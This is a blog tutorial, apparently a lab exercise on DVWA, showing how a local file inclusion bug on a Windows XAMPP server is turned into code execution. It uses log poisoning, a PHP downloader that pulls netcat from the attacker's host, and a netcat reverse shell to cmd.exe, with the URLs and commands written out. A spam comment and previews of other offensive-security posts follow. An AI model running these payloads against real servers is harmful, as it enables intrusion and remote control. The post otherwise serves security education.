PHP script downloader and Reverse Shell with Netcat



Let's say that your server has LFI vulnerability or the attacker could upload an evil php script on your web server. In this case i will explore the first condition which is LFI. Let's create a little more difficult scenario for attacker and something more secure for the victim :)
Webserver has Windows 7 machine + Xampp but has one small misconfiguration problem which can lead to a disastrous for a webserver. The admin forgot to disable those variables in php.ini file register_globals and allow_url and allow for an attacker to include a local or remote file into running php code.


Attacker send this code to webserver log file through Netcat






In victim's machine we can see how the previous request saved in log file





Now attacker visits victim's vulnerable web page with his browser





In linux webserver has this tools preinstalled wget,nc,sbd,ncat but what about windows?I leave as an exersice to you and make your own research about other ways which can give a reverse shell. Attacker wants to download netcat from his server and execute it. The following script downloads file from attacker's server

http://localhost/dvwa/vulnerabilities/fi/?page=C:\xampp\apache\logs\access.log&cmd=echo+"<?php+$socket=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_connect($socket,'192.168.1.6',8888);socket_recv($socket,$buf,29184,MSG_WAITALL);$file=fopen('backdoor.exe','wb');fwrite($file,$buf);socket_close($socket);?>"+>+downloader.php


Attacker uses netcat listener to upload his file but firstly uses upx to compress netcat.

nc -nlvp 8888 < nc.exe



Reverse Shell

After successful download it is time for attacker to execute his backdoor and get a remote shell. It setup a new listener in port 7777


Attacker's Box  -> nc -nlvp 7777



http://localhost/dvwa/vulnerabilities/fi/?page=C:\xampp\apache\logs\access.log&cmd=cmd+/c+backdoor.exe+192.168.1.6+7777+-e+cmd.exe

Comments

  1. AnonymousApril 27, 2022 at 1:38 AM

    Php Script Er And Reverse Shell With Netcat >>>>> Download Now

    >>>>> Download Full

    Php Script Er And Reverse Shell With Netcat >>>>> Download LINK

    >>>>> Download Now

    Php Script Er And Reverse Shell With Netcat >>>>> Download Full

    >>>>> Download LINK F9

    ReplyDelete

Post a Comment

Popular posts from this blog

Unhide a Hidden GPO

Image
Lately, i read on a very good write-up regarding to GPO's abuse. The name of the article is "GPO abuse - You can't see me" and you can read it  here  . The first question that came to my mind was "Why i can't see you?". Many times GUI is more convenient than PowerShell but in that case i found PowerShell better for me as well as i didn't want to use PowerView. I wanted to create something from the scratch and the biggest motivation is education. So i started to ask myself "if you compromise a host during an assessment, how you can enumerate GPOs without PowerView?". Remember that you are a low privileged user, so may you are not be able to import modules and you can't import ActiveDirectory to Windows 10 and use Get-AD****. The correct answer is "ADSI" and luckily for me, doesn't need to be an expert to use it for simple requests as mine. On this post i will try enumerate domain's GPO using ADSI as well as to unhide h
Read more

Hiding Data Using White Space (Steganography)

Image
Steganography is a technique of hiding  a secret message within an ordinary message and extracting it at the destination to maintain confidentiality of data. An attacker can use steganography to hide messages such as  source code for hacking tools, usernames and passwords, plans for future attacks and many more. Below i will explain how could this achieved in practice using Snow tool. 1)Create a simple txt file and browse to snow directory with command prompt and write the command below.   2)After creating the encrypt txt file you can open it and observe the differences.Have they got the same size?No. What else you could see ? 3)Decrypt the file and extract the hidden message. References: https://en.wikipedia.org/wiki/Steganography
Read more

Basic Pivoting with Cobaltstrike and Metasploit

Image
Last week we participated in a virtual network pentest in order to test our skills and the security of the network as well. During the pentest we encountered various problems during the host pivoting, so we wrote down the difficulties that we faced and how to solve them. Among various problems that we have faced was the initial beacon from the DMZ zone. Since, the web delivery could not executed, we have moving into https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1 , a powershell script from nishang tool which is created from Nikhil Mittal. As the most real case scenarios so and this, the internal network seating behind a DMZ zone. So our first objective is to compromise somehow the external DMZ network and then we will use MSF and CobaltStrike to hope between hosts.   CobaltStrike Pivoting After enumerating the external network which we managed to upload a php file and execute system commands on the remote m
Read more